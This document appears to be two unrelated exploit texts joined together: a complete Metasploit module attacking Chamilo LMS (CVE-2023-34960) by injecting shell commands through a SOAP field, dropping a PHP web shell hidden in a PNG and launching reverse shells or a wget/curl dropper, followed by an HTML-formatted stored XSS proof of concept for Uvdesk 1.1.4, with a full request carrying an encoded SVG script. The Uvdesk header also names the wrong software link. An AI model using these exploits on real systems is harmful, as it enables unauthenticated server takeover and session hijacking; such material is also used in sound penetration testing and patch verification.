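# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

# Chamilo LMS <= 1.11.18 unauthenticated command injection (CVE-2023-34960).
#
# The Chamilo Rapid PowerPoint-to-course converter exposes the SOAP method
# wsConvertPpt on main/webservices/additional_webservices.php. The caller
# supplied file_name reaches a shell command, so every target of this module
# rides the same primitive: one shell command smuggled through that field in
# a single unauthenticated SOAP request.
class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Format::PhpPayloadPng
  prepend Msf::Exploit::Remote::AutoCheck

  # Characters accepted in an operator-supplied WEBSHELL name. The name is
  # interpolated unquoted into a shell redirection, embedded as XML text and
  # used as a URI path segment, so shell metacharacters, quotes, '<', '&',
  # whitespace and path separators are all rejected up front.
  WEBSHELL_NAME_PATTERN = /\A[A-Za-z0-9_][A-Za-z0-9_.-]*\z/

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Chamilo unauthenticated command injection in PowerPoint upload',
        'Description' => %q{
          Chamilo is an e-learning platform, also called Learning Management Systems (LMS).
          This module exploits an unauthenticated remote command execution vulnerability
          that affects Chamilo versions `1.11.18` and below (CVE-2023-34960).
          Due to a functionality called Chamilo Rapid to easily convert PowerPoint
          slides to courses on Chamilo, it is possible for an unauthenticated remote
          attacker to execute arbitrary commands at OS level using a malicious SOAP
          request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.
        },
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Module Author
          'Randorisec' # Original research
        ],
        'References' => [
          ['CVE', '2023-34960'],
          ['URL', 'https://www.randorisec.fr/pt/chamilo-1.11.18-multiple-vulnerabilities'],
          ['URL', 'https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960']
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['php', 'unix', 'linux'],
        'Privileged' => false,
        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],
        'Targets' => [
          [
            'PHP',
            {
              'Platform' => 'php',
              'Arch' => ARCH_PHP,
              'Type' => :php,
              'DefaultOptions' => {
                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
              }
            }
          ],
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_bash'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
              'Type' => :linux_dropper,
              'Linemax' => 65535,
              'CmdStagerFlavor' => ['wget', 'curl'],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-06-01',
        'DefaultOptions' => {
          'SSL' => false,
          'RPORT' => 80
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )
    register_options([
      OptString.new('TARGETURI', [ true, 'The Chamilo endpoint URL', '/' ]),
      OptString.new('WEBSHELL', [
        false, 'The name of the webshell with extension. Webshell name will be randomly generated if left unset.', nil
      ], conditions: %w[TARGET == 0])
    ])
  end

  # Builds the SOAP envelope that triggers CVE-2023-34960.
  #
  # The command is placed in the file_name field behind a quote-breaking
  # prefix. Callers must keep +cmd+ free of XML-significant characters
  # ('<', '&'); every caller in this module passes base64 text plus a fixed
  # pipeline, which satisfies that.
  #
  # @param cmd [String] shell command to run on the target
  # @return [String] the XML request body
  def soap_request(cmd)
    # Randomise the requested slide size so the request is not a fixed IOC.
    ppt_size = "#{rand(720..1440)}x#{rand(360..720)}"

    <<~EOS
      <?xml version="1.0" encoding="UTF-8"?>
      <SOAP-ENV:Envelope
        xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
        xmlns:ns1="#{target_uri.path}"
        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:ns2="http://xml.apache.org/xml-soap"
        xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
        SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <SOAP-ENV:Body>
          <ns1:wsConvertPpt>
            <param0 xsi:type="ns2:Map">
              <item>
                <key xsi:type="xsd:string">file_data</key>
                <value xsi:type="xsd:string"></value>
              </item>
              <item>
                <key xsi:type="xsd:string">file_name</key>
                <value xsi:type="xsd:string">`{{}}`.pptx'|" |#{cmd}||a #</value>
              </item>
              <item>
                <key xsi:type="xsd:string">service_ppt2lp_size</key>
                <value xsi:type="xsd:string">#{ppt_size}</value>
              </item>
            </param0>
          </ns1:wsConvertPpt>
        </SOAP-ENV:Body>
      </SOAP-ENV:Envelope>
    EOS
  end

  # POSTs a SOAP envelope carrying +cmd+ to the vulnerable web service.
  #
  # @param cmd [String] shell command, see soap_request for constraints
  # @return [Rex::Proto::Http::Response, nil] nil when no response arrived
  def send_soap_command(cmd)
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'main', 'webservices', 'additional_webservices.php'),
      'ctype' => 'text/xml; charset=utf-8',
      'data' => soap_request(cmd).to_s
    })
  end

  # Picks the web shell file name: the WEBSHELL option when set (validated
  # against WEBSHELL_NAME_PATTERN), otherwise a random alphabetic .php name.
  #
  # @return [String]
  # @raise [Msf::Exploit::Failed] via fail_with when WEBSHELL is unsafe
  def resolve_webshell_name
    return "#{Rex::Text.rand_text_alpha(8..16)}.php" if datastore['WEBSHELL'].blank?

    name = datastore['WEBSHELL'].to_s
    unless name.match?(WEBSHELL_NAME_PATTERN)
      fail_with(Failure::BadConfig, "WEBSHELL '#{name}' contains characters that are unsafe in the shell command, XML body or URI; use letters, digits, '.', '_' and '-' only.")
    end
    name
  end

  # Drops a PHP web shell (hidden inside a PNG) into the converter's working
  # directory, where the PHP target later POSTs its stage. Sets @webshell_name
  # and @post_param for execute_php.
  #
  # While it exists on disk the shell is an unauthenticated eval endpoint for
  # anyone who knows its name; FileDropper only removes it once a session is
  # established, so a failed run leaves it behind.
  #
  # @return [Rex::Proto::Http::Response, nil] the SOAP response, nil when no
  #   response arrived
  # @raise [Msf::Exploit::Failed] via fail_with on bad WEBSHELL or PNG failure
  def upload_webshell
    @webshell_name = resolve_webshell_name
    @post_param = Rex::Text.rand_text_alphanumeric(1..8)

    # The PHP stub is tucked into the PLTE chunk so the file still parses as
    # an image; the stage arrives base64-encoded in a POST parameter.
    php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"
    png_webshell = inject_php_payload_png(php_payload, injection_method: 'PLTE')
    fail_with(Failure::Unknown, 'Failed to generate the PNG web shell.') if png_webshell.nil?

    # Base64 keeps the binary PNG XML-safe; openssl decodes it on the target
    # because it is more commonly installed than the coreutils base64 tool.
    # NOTE(review): openssl's base64 decoder is line-oriented unless -A is
    # given; confirm a long single-line input decodes on the targets in scope.
    encoded_shell = Base64.strict_encode64(png_webshell.to_s)
    cmd = "echo #{encoded_shell}|openssl enc -a -d > ./#{@webshell_name}"

    send_soap_command(cmd)
  end

  # Sends a PHP stage to the dropped web shell for eval.
  #
  # @param cmd [String] PHP code (without an opening tag) to execute
  # @param _opts [Hash] unused; kept for a CmdStager-compatible signature
  # @return [Rex::Proto::Http::Response, nil]
  def execute_php(cmd, _opts = {})
    encoded_stage = Base64.strict_encode64(cmd)
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'main', 'inc', 'lib', 'ppt2png', @webshell_name),
      'ctype' => 'application/x-www-form-urlencoded',
      'vars_post' => {
        @post_param => encoded_stage
      }
    })
  end

  # Runs a shell command on the target through the SOAP injection.
  #
  # The command is base64-encoded so arbitrary payload bytes survive the XML
  # body and the quote-breaking prefix, then decoded with openssl and piped
  # into sh on the target.
  #
  # @param cmd [String] shell command to execute
  # @param _opts [Hash] unused; CmdStager passes options here
  # @return [Rex::Proto::Http::Response, nil]
  def execute_command(cmd, _opts = {})
    encoded_cmd = Base64.strict_encode64(cmd)
    # NOTE(review): see upload_webshell about openssl and long single lines.
    send_soap_command("echo #{encoded_cmd}|openssl enc -a -d|sh")
  end

  # Active check: runs `echo <random marker>` through the injection and looks
  # for the marker in the SOAP response. This executes a (harmless) command
  # on the target and leaves a request in the web server log.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    print_status("Checking if #{peer} can be exploited.")
    marker = Rex::Text.rand_text_alphanumeric(8..16)
    res = execute_command("echo #{marker}")

    # No answer at all says nothing about the target; only a real response
    # without the marker justifies calling it safe.
    return CheckCode::Unknown('No response received from the target.') if res.nil?

    if res.code == 200 && res.body.include?('wsConvertPptResponse') && res.body.include?(marker)
      return CheckCode::Vulnerable("Command output (#{marker}) was reflected in the wsConvertPpt response.")
    end

    CheckCode::Safe("Received HTTP #{res.code} without the marker; the endpoint does not appear to be injectable.")
  end

  # Delivers the selected payload through the target-specific primitive.
  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :php
      res = upload_webshell
      fail_with(Failure::Unreachable, 'No response to the web shell upload request.') if res.nil?
      unless res.code == 200 && res.body.include?('wsConvertPptResponse')
        fail_with(Failure::UnexpectedReply, "Web shell upload error (HTTP #{res.code}).")
      end
      # Registered as a bare name: cleanup runs relative to the session's
      # working directory, presumably the ppt2png directory the shell was
      # written to — verify if cleanup ever reports a missing file.
      register_file_for_cleanup(@webshell_name.to_s)
      execute_php(payload.encoded)
    when :unix_cmd
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager({ linemax: target.opts['Linemax'] })
    end
  end
end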
<pre><code># Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated)<br /># Date: 14/08/2023<br /># Exploit Author: Hubert Wojciechowski<br /># Contact Author: hub.woj12345@gmail.com<br /># Vendor Homepage: https://www.uvdesk.com/<br /># Software Link: https://github.com/MegaTKC/AeroCMS<br /># Version: 1.1.4<br /># Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23<br /><br /># An authenticated user with access to tickets can store an XSS payload in a ticket thread. It executes in the browser of any admin or other user who views the ticket, allowing session hijacking (where the session cookie is not HttpOnly) or actions in the victim's authenticated context.<br /><br />## Example: stored XSS in a new ticket thread<br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Param: reply<br />-----------------------------------------------------------------------------------------------------------------------<br />Req<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1<br />Host: 127.0.0.1<br />Content-Length: 812<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://127.0.0.1<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSk<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1<br />Accept-Encoding: gzip, deflate<br />Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3<br />Connection: close<br /><br /><br 
/>------WebKitFormBoundaryXCjJcGbgZxZWLsSk<br />Content-Disposition: form-data; name="threadType"<br /><br />forward<br />------WebKitFormBoundaryXCjJcGbgZxZWLsSk<br />Content-Disposition: form-data; name="status"<br /><br /><br />------WebKitFormBoundaryXCjJcGbgZxZWLsSk<br />Content-Disposition: form-data; name="subject"<br /><br />aaaa<br />------WebKitFormBoundaryXCjJcGbgZxZWLsSk<br />Content-Disposition: form-data; name="to[]"<br /><br />test@local.host<br />------WebKitFormBoundaryXCjJcGbgZxZWLsSk<br />Content-Disposition: form-data; name="reply"<br /><br />%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E<br />------WebKitFormBoundaryXCjJcGbgZxZWLsSk<br />Content-Disposition: form-data; name="pic"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryXCjJcGbgZxZWLsSk<br />Content-Disposition: form-data; name="nextView"<br /><br />stay<br />------WebKitFormBoundaryXCjJcGbgZxZWLsSk--<br /><br /><br />-----------------------------------------------------------------------------------------------------------------------<br />Res:<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />HTTP/1.1 302 Found<br />Date: Mon, 14 Aug 2023 11:33:26 GMT<br />Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29<br />X-Powered-By: PHP/7.4.29<br />Cache-Control: max-age=0, must-revalidate, private<br />Location: /uvdesk/public/en/member/ticket/view/1<br />Access-Control-Allow-Origin: *<br 
/>Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS<br />Access-Control-Allow-Headers: Access-Control-Allow-Origin<br />Access-Control-Allow-Headers: Authorization<br />Access-Control-Allow-Headers: Content-Type<br />X-Debug-Token: bf1b73<br />X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73<br />X-Robots-Tag: noindex<br />Expires: Mon, 14 Aug 2023 11:33:26 GMT<br />Set-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=lax<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 398<br /><br /><!DOCTYPE html><br /><html><br /> <head><br /> <meta charset="UTF-8" /><br /> <meta http-equiv="refresh" content="0;url='/uvdesk/public/en/member/ticket/view/1'" /><br /><br /> <title>Redirecting to /uvdesk/public/en/member/ticket/view/1</title><br /> </head><br /> <body><br /> Redirecting to <a href="/uvdesk/public/en/member/ticket/view/1">/uvdesk/public/en/member/ticket/view/1</a>.<br /> </body><br /></html><br />-----------------------------------------------------------------------------------------------------------------------<br />Redirect and view response:<br />-----------------------------------------------------------------------------------------------------------------------<br />HTTP/1.1 200 OK<br />Date: Mon, 14 Aug 2023 11:44:14 GMT<br />Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29<br />X-Powered-By: PHP/7.4.29<br />Cache-Control: max-age=0, must-revalidate, private<br />Access-Control-Allow-Origin: *<br 
/>Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS<br />Access-Control-Allow-Headers: Access-Control-Allow-Origin<br />Access-Control-Allow-Headers: Authorization<br />Access-Control-Allow-Headers: Content-Type<br />X-Debug-Token: 254ce8<br />X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8<br />X-Robots-Tag: noindex<br />Expires: Mon, 14 Aug 2023 11:44:14 GMT<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 300607<br /><br /><!DOCTYPE html><br /><html><br /> <head><br /> <title>#1 vvvvvvvvvvvvvvvvvvvvv</title><br />[...]<br /><p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" width="300" height="150"></embed></p><br />[...]<br />-----------------------------------------------------------------------------------------------------------------------<br /><br />The stored payload (an embed element loading a base64-encoded data: SVG that contains a script) is returned unescaped in the ticket view and executes when the ticket is rendered, so an attacker can deliver it simply by replying to a victim's ticket. The author reports the same payload is also accepted in new articles, new tickets and other rich-text fields across the application. Note that the responses also expose Symfony's web profiler (X-Debug-Token-Link pointing at /_profiler/), which suggests this test instance runs in debug mode; that is separate from the XSS but should not be exposed on a production install.<br /> <br /><br /><br /></code></pre>